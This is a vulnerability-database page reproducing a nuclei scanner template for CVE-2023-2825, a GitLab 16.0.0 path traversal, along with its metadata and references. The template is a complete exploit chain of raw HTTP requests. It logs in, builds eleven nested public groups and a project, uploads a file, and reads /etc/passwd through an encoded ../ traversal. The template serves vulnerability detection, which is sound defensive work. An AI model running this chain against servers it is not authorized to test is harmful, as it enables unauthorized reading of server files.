Lucene search
K

GitLab 16.0.0 - Path Traversal

🗓️ 26 Jun 2026 18:13:08Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 84 Views

GitLab 16.0.0 Path Traversal CVE-2023-2825: Unauthenticated users exploit path traversal vulnerability to read server files in public nested projec

Related
Refs
Code
id: CVE-2023-2825

info:
  name: GitLab 16.0.0 - Path Traversal
  author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
  impact: |
    Authenticated attackers can exploit path traversal vulnerabilities to read arbitrary files from GitLab 16.0.0 servers when attachments exist in public projects nested within at least five groups.
  remediation: |
    Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).
  reference:
    - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
    - https://github.com/Occamsec/CVE-2023-2825
    - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2825
    - https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-2825
    cwe-id: CWE-22
    epss-score: 0.71641
    epss-percentile: 0.99341
    cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 16
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve2023,cve,gitlab,lfi,authenticated,intrusive,vuln
variables:
  data: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /users/sign_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        @timeout: 15s
        POST /projects HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}
      - |
        POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-CSRF-Token: {{x-csrf-token}}
        Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6

        --0ce2a9fbe06b6da89c138a35a1765ed6
        Content-Disposition: form-data; name="file"; filename="{{randstr}}"

        {{randstr}}
        --0ce2a9fbe06b6da89c138a35a1765ed6--
      - |
        GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 726f6f743a78
        encoding: hex

      - type: word
        part: header
        words:
          - application/octet-stream
          - etc%2Fpasswd
        condition: and

    extractors:
      - type: regex
        name: token_1
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true
        part: body

      - type: regex
        name: token_2
        group: 1
        regex:
          - name="csrf\-token" content="([A-Z_0-9a-z-]+)"
        internal: true
        part: body

      - type: regex
        name: parent_id
        group: 1
        regex:
          - href="\/groups\/new\?parent_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: namespace_id
        group: 1
        regex:
          - ref="\/projects\/new\?namespace_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: x-csrf-token
        group: 1
        regex:
          - const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"
        internal: true
        part: body

      - type: regex
        name: upload-hash
        group: 1
        regex:
          - '"url":"\/uploads\/([0-9a-z]+)\/'
        internal: true
        part: body
# digest: 4a0a0047304502200fafff50b065860e29e36641b9c3d98f6fcc7f3562548c2c6cf8b3348c9f227202210097fffa68731e96a1fbb45db3cbe341c790918d63f75f55b6fbb621160d716743:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5 - 10
EPSS0.71641
SSVC
84